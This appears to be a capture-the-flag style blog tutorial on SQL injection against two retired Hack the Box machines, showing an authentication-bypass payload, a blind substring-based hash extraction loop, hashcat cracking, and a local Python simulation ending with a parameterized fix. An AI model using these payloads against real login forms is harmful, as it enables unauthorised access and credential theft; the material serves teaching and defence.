Are you starting a new website or running one? How secure is it? In this article, we shall illustrate how a hacker can exploit SQL injection vulnerabilities to gain access to your site.

And if you are looking forward to starting your own website, you can use Hostinger for Premium Quality Web Hosting.


This is the first of many articles coming up soon. Today, I will focus on the basics of SQL Injection. I will be using the Hack the Box retired machines to draw the examples.

Example 1: Sneaky Machine

On visiting the site http://10.10.10.20, we see a simple page as below

The page source does not reveal much information either.

From here, the next step is a quick directory search: ./dirsearch.py -u http://10.10.10.20 -e php. Fortunately, this shows we have a dev directory, as below.

On visiting the page, we are presented with a login form.

Since I see no hints about which application this is running, I send this page over to Burp Suite. For every wrong username/password combination I keep getting a "404 error, not found".

I try several combinations, including something like ‘ “– -%$^@&@*@*kjld (500),'”” for the password, and I note that the error message changes.

With this insight, I head over to the SQL injection authentication bypass cheat sheet and try several items on the list. Interestingly, the value admin' or '1'='1 gets us in. This works whether you pass the value in the username or the password field, because 1 = 1 always evaluates to true.

Example 2: Falafel Machine

On visiting the website http://10.10.10.73, we see a login page. We test a quick login with the admin/password combination and get the error message "Wrong identification: admin".

I send this over to Burp and try several random username/password combinations. I notice the error message changes to "Try again,, " for wrong usernames. Interestingly, however, when I add a database comment after the admin username (username=admin'--+-), I see the "wrong identification: admin" error again. This is juicy.
If we look back at what is happening, it is likely that the query running here looks something like "SELECT username FROM table_name where username = 'entered_value'".

Let's analyze this a bit:
If we enter admin, the query becomes "SELECT username FROM table_name where username = 'admin' and password = 'not_correct'" => "wrong identification: admin"
If we comment out everything after admin, the query becomes "SELECT username FROM table_name where username = 'admin'-- - and password = 'not_correct'"; everything after -- - is a comment and is ignored, so the password check is dropped => "wrong identification: admin"
If we enter a wrong username, the query becomes "SELECT username FROM table_name where username = 'not_correct' and password = 'not_correct'" => "Try again,, "

First of all, we have confirmed that the user admin exists. Secondly, we note that if the SQL condition is true, we see the wrong identification error; otherwise, we see the try again error. The task now is to work out how to pull the admin password hash from the database. I came across an article on SQLShack that clearly explains how to use the SQL substring function. The question is how to use it to fetch the password hash one character at a time.

Something in that article stands out. See the format below:
SELECT FirstName, substring(firstname,1,5), lastname FROM Person.Person

I infer that, given the correct username, we can fetch the password one character at a time. The logic is to loop through a list of characters, check whether each one matches the character at that position in the database, and print the match. Since the server-side language here is PHP, it is reasonable to assume that the database is MySQL. If we carry on with that assumption, the password hashes are usually MD5, 32 hexadecimal characters in length.

Now our injected username looks like this: admin' and substring(password,position_from_loop,1) = 'character_from_loop'-- -, so the query the server runs becomes "SELECT username FROM table_name where username = 'admin' and substring(password,position_from_loop,1) = 'character_from_loop'-- - ..." and the error message tells us whether the guessed character is right.
A Python script as below:

Running this with the admin username returns the password hash: 0e462096931906507119562988736854. We can repeat the process and fuzz for more usernames. To save some time: there is another user named Chris, and we can retrieve his password hash with the same script. This gives us d4ee02a22fc872e36d9e3751ba72ddc8.
We send the hash over to hashcat; the mode for MD5 is 0, so the command looks like "hashcat -m 0 d4ee02a22fc872e36d9e3751ba72ddc8 [the_wordlist_here]".

We use the creds Chris/juggling and we are logged in:
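To make both examples concrete without touching a live server, here is an added, self-contained Python simulation (it is not the author's script, which is not reproduced on this page, and not code from either Hack the Box machine). It assumes two plausible shapes for the vulnerable PHP logins: a Sneaky-style query with both fields concatenated into the WHERE clause, and a Falafel-style query with only the username concatenated and the password checked afterwards. The users, passwords and the in-memory SQLite table are constructed for the demo; the function names are made up. It shows the admin' or '1'='1 bypass, why two distinct failure messages act as a true/false oracle for the substring loop described above, and how a parameterized query with a single generic failure message closes both holes.

```python
import hashlib
import sqlite3

# Constructed demo data: an in-memory SQLite table standing in for the MySQL
# table behind the two login forms. Usernames and passwords are made up.
DEMO_USERS = (("admin", "s3cret-demo"), ("chris", "juggling-demo"))
HEX = "0123456789abcdef"  # alphabet of an MD5 hex digest, as the article assumes


def md5(text: str) -> str:
    """Hex MD5 of a string (the hash format the article assumes for stored passwords)."""
    return hashlib.md5(text.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(u, md5(p)) for u, p in DEMO_USERS])
    return conn


def sneaky_login(conn, username, password):
    """Example 1 shape (assumed): both fields are pasted into the WHERE clause.
    A username of  admin' or '1'='1  turns the clause into
    username = 'admin' OR ('1'='1' AND password = ...), which is true for admin."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{md5(password)}'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Error"  # the server-side error the article saw for malformed junk input
    return f"Logged in as {row[0]}" if row else "Try again"


def falafel_login(conn, username, password):
    """Example 2 shape (assumed): only the username is pasted into SQL; the password
    is compared afterwards. The two distinct failure messages are the oracle."""
    sql = f"SELECT username, password FROM users WHERE username = '{username}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Error"
    if row is None:
        return "Try again"          # no row matched the (injected) username clause
    if row[1] == md5(password):
        return f"Logged in as {row[0]}"
    return f"Wrong identification: {row[0]}"  # row matched, password did not


def safe_login(conn, username, password):
    """Hardened form: a parameterized query, so input never becomes SQL syntax,
    plus one generic failure message, so there is nothing to use as an oracle."""
    row = conn.execute("SELECT username, password FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None or row[1] != md5(password):
        return "Try again"
    return f"Logged in as {row[0]}"


def extract_hash(conn, login, username, length=32):
    """The character-by-character loop the article describes, run against the
    local login function instead of a web server. Returns the recovered hash,
    or None as soon as some position gets no 'true' answer (no usable oracle)."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            # MySQL's substring() is substr() in SQLite; the technique is identical.
            probe = f"{username}' and substr(password,{pos},1) = '{ch}'-- -"
            if login(conn, probe, "not_correct").startswith("Wrong identification"):
                recovered += ch
                break
        else:
            return None
    return recovered


if __name__ == "__main__":
    db = build_db()
    print(sneaky_login(db, "admin' or '1'='1", "anything"))   # Logged in as admin
    print(falafel_login(db, "admin'-- -", "anything"))         # Wrong identification: admin
    print(extract_hash(db, falafel_login, "admin") == md5("s3cret-demo"))  # True
    print(safe_login(db, "admin' or '1'='1", "anything"))      # Try again
    print(extract_hash(db, safe_login, "admin"))               # None
```

The defensive takeaways are in safe_login: binding the username as a parameter means the quote and comment characters in the probes are just data, and returning the same "Try again" for an unknown user and for a wrong password removes the second signal the loop depends on. Either change alone helps; together they leave extract_hash with nothing to work from.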

Further References

Manual SQL Guide by Raj Chandel: https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/